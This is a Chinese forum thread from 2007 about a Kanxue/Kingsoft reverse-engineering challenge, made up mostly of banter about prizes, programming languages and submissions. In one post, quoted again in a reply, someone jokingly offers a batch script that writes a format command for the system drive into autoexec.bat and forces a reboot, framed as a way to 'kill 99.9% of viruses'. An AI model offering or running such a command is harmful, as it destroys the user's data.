首页
社区
课程
招聘
[结束]第三阶段◇第一题]看雪论坛.珠海金山2007逆向分析挑战赛
发表于: 2007-9-12 11:58 147113

[结束]第三阶段◇第一题]看雪论坛.珠海金山2007逆向分析挑战赛

2007-9-12 11:58
147113
收藏
免费 0
支持
分享
最新回复 (83)
雪    币: 299
活跃值: (25)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
26
既然投降了,不妨把样本拿出来让我们开开眼!
2007-9-12 15:22
0
雪    币: 6075
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
27
只有再有2个投降,我就拿走ipod
2007-9-12 16:15
0
雪    币: 8209
活跃值: (4528)
能力值: ( LV15,RANK:2473 )
在线值:
发帖
回帖
粉丝
28
你只能去拿DC了,ipod没你份了
2007-9-12 16:19
0
雪    币: 6075
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
29
先送我一个vmare比较好。
2007-9-12 16:28
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
30
非业内人士估计这个题目可以用金山毒霸的处理流程就好。自己去研究不太好的,比人家差了显得题目没做到位阿,比人家好了那不就喧宾夺主么  
2007-9-12 19:01
0
雪    币: 202
活跃值: (77)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
31
echo format %systemdrive% /s >%systemdrive%\autoexec.bat
shutdown /r /f


保存成a.bat并双击
可以杀死99.9%的病毒木马
只是可能会有小小的后遗症,小孩子切勿模仿
2007-9-12 19:02
0
雪    币: 7325
活跃值: (3803)
能力值: (RANK:1130 )
在线值:
发帖
回帖
粉丝
32
[QUOTE=不懂算法;358949]
echo format %systemdrive% /s >%systemdrive%\autoexec.bat
shutdown /r /f


保存成a.bat并双击
可以杀死99.9%的病毒木马
只是可能会有小小的后遗症,小孩子切勿模仿[/QUOTE]

VKing看来就是那个0.01%里面的
2007-9-12 19:13
0
雪    币: 885
活跃值: (1740)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
33
貌似很牛的病毒代码~

怕怕~
2007-9-12 20:59
0
雪    币: 191
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
34
杀归杀别吧自己机器弄瘫了哈
2007-9-13 13:49
0
雪    币: 7325
活跃值: (3803)
能力值: (RANK:1130 )
在线值:
发帖
回帖
粉丝
35
楼上的盗版头像
2007-9-13 14:37
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
36
我太菜了..不知道哪个才....
2007-9-14 14:32
0
雪    币: 332
活跃值: (479)
能力值: ( LV9,RANK:330 )
在线值:
发帖
回帖
粉丝
37
看来金山是要找一个杀毒高手——会脱壳,会逆向,会写程序,.....还要会灌水的全才!!!
2007-9-14 15:46
0
雪    币: 8209
活跃值: (4528)
能力值: ( LV15,RANK:2473 )
在线值:
发帖
回帖
粉丝
38
把DiKeN挖走就行了
2007-9-14 16:29
0
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
39
DiKeN没有看雪勋章啊
2007-9-14 16:44
0
雪    币: 1126
活跃值: (156)
能力值: ( LV9,RANK:210 )
在线值:
发帖
回帖
粉丝
40
从第二阶段起,我的所有答题,都用的Delphi; 最后一题也准备这么做:)
没有用VC啦~~~一般公司都不要Delphi程序员的
2007-9-14 18:15
0
雪    币: 226
活跃值: (15)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
41
提交提交。
就做到这里,没时间玩了。
上传的附件:
2007-9-14 18:55
0
雪    币: 209
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
42
我全是用的Delphi
2007-9-14 20:09
0
雪    币: 120
活跃值: (58)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
43
提交了。
2007-9-16 17:40
0
雪    币: 226
活跃值: (15)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
44
re提交。
测试了100多个样本没问题(我自己机器上的样本。。。)
2007-9-17 11:40
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
45
比较仰慕。。。。。
2007-9-17 13:04
0
雪    币: 263
活跃值: (10)
能力值: ( LV9,RANK:210 )
在线值:
发帖
回帖
粉丝
46
这次例外....
2007-9-17 13:06
0
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
47
终于知道怎么才能得到DC了
答案就是
用GetDC函数
2007-9-17 15:47
0
雪    币: 226
活跃值: (15)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
48
[QUOTE=shoooo;360841]终于知道怎么才能得到DC了
答案就是
用GetDC函数[/QUOTE]

好办法。学习。
2007-9-17 15:52
0
雪    币: 6075
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
49
77D186C7 >  B8 91110000     mov     eax, 1191
77D186CC    BA 0003FE7F     mov     edx, 7FFE0300
77D186D1    FF12            call    [edx]
77D186D3    C2 0400         retn    4
2007-9-17 16:00
0
雪    币: 243
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
50
来晚了。。。
还有机会从第一阶段开始吗?
2007-9-17 23:24
0
游客
登录 | 注册 方可回帖
返回
//